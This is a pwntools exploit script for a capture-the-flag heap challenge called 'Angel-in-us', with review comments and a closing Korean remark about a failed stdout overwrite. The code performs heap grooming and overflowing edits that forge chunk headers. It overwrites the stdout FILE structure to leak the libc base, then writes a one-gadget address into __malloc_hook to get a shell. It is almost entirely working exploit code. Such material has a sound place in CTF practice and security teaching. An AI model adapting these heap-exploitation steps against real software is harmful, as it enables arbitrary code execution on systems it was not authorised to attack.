Angel-in-us
from pwn import *

def alloc(size, pay):
    """Pick menu entry 'M' on the target, then submit a size and a payload.

    Every write goes through the module-level tube ``p`` and waits for the
    '>' prompt first. ``size`` is converted with str() and sent with a
    trailing newline; ``pay`` is sent exactly as given, with no newline.
    """
    prompt = '>'
    p.sendafter(prompt, 'M')
    size_field = str(size)
    p.sendlineafter(prompt, size_field)
    p.sendafter(prompt, pay)

def edit(size, pay):
    """Pick menu entry 'E' on the target, then submit a size and a payload.

    Mirrors alloc() apart from the menu letter: three prompt-gated writes on
    the module-level tube ``p``. Nothing here checks ``size`` against any
    earlier allocation; whatever length the caller passes is sent on.
    """
    prompt = '>'
    menu_choice = 'E'
    p.sendafter(prompt, menu_choice)
    length_line = str(size)
    p.sendlineafter(prompt, length_line)
    p.sendafter(prompt, pay)

# Driver section: runs top to bottom against a locally spawned ./angel-in-us
# process. Python 2 only (print statement, str-typed payloads).
#
# NOTE(review): the target binary is not shown on this page, so the heap
# interpretation in the comments below is inferred from the values sent and
# should be confirmed against the binary.
# What the script itself shows: alloc(0x90, ...) is followed by
# edit(0xa0, ...), i.e. the 'E' path is handed more bytes than the 'M' path
# requested. If the binary accepts that, the root cause is a missing bound on
# the edit length; the fix is to cap the edit size at the size recorded when
# the buffer was allocated.
# NOTE(review): 0x3ed8b0 and 0x10a38c are raw offsets relative to the libc
# base and are therefore tied to one specific libc build (not named on the
# page). 0x404020 is an absolute address, so the script assumes the binary is
# loaded at a fixed address (no PIE). The last stage goes through
# __malloc_hook; glibc no longer calls the malloc hooks since 2.34, so that
# stage does not carry over to current glibc.
p = process('./angel-in-us')
e = ELF('./angel-in-us')
# libc object that pwntools associates with the binary; used only for the
# __malloc_hook symbol offset further down.
l = e.libc

# 0x30 requests of 0x130 bytes, each with a one-byte payload. Presumably
# heap grooming before the next request -- TODO confirm.
for i in range(0x30):
    alloc(0x130, 'a')

# Request 0x90 bytes, then edit with length 0xa0: the payload is 0x90 filler
# bytes followed by p64(0) and p64(0x111), so 16 bytes are sent beyond the
# requested size. Looks like a forged chunk header -- TODO confirm.
alloc(0x90, 'a')
edit(0xa0, 'a'*0x90+p64(0)+p64(0x111))

# Select 'M' and answer the size prompt with a 0x410-character string of '1'
# digits; no payload is sent afterwards. Presumably relied on for a side
# effect of the input path -- the page does not explain it.
p.sendafter('>', 'M')
p.sendlineafter('>', '1'*0x410)

# Edit again, now with length 0xb0: the three qwords after the filler are
# 0, 0xf1 and the fixed address 0x404020.
edit(0xb0, 'a'*0x90+p64(0)+p64(0xf1)+p64(0x404020))
# Three 0xe0 requests: filler, the single byte 0x60, then 0xfbad1800 followed
# by 0x19 zero bytes. The note at the end of the page mentions
# _IO_2_1_stdout, so the last write presumably lands on the stdout FILE
# structure -- TODO confirm.
alloc(0xe0, 'a')
alloc(0xe0, '\x60')
alloc(0xe0, p64(0xfbad1800)+'\x00'*0x19)

# Read up to the first 0x7f byte, keep the last 6 bytes, zero-pad to 8 and
# unpack as a 64-bit value; subtracting the fixed offset gives the value the
# rest of the script uses as the libc base.
libc = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3ed8b0
print hex(libc)

# Second round, same shape as the first with different sizes: 0x32 requests
# of 0x130 bytes, then a 0x50 request edited with length 0x60.
for i in range(0x32):
    alloc(0x130, 'a')
    
alloc(0x50, 'a')
edit(0x60, 'a'*0x50+p64(0)+p64(0x121))

# Same oversized digit string at the size prompt as in the first round.
p.sendafter('>', 'M')
p.sendlineafter('>', '1'*0x410)

# Edit with length 0x70: the qwords after the filler are 0, 0x101 and the
# computed address of __malloc_hook (libc base + symbol offset).
edit(0x70, 'a'*0x50+p64(0)+p64(0x101)+p64(libc+l.sym['__malloc_hook']))
# Two 0xf0 requests; the second one's payload is libc base + 0x10a38c.
# Presumably that write lands on __malloc_hook -- TODO confirm.
alloc(0xf0, 'a')
alloc(0xf0, p64(libc+0x10a38c))

# Hand the tube over to the terminal for manual interaction.
p.interactive()

_IO_2_1_stdout_ 를 다 덮어서 쉘 따려했는데 vtable check에 막힘 ㅠㅠ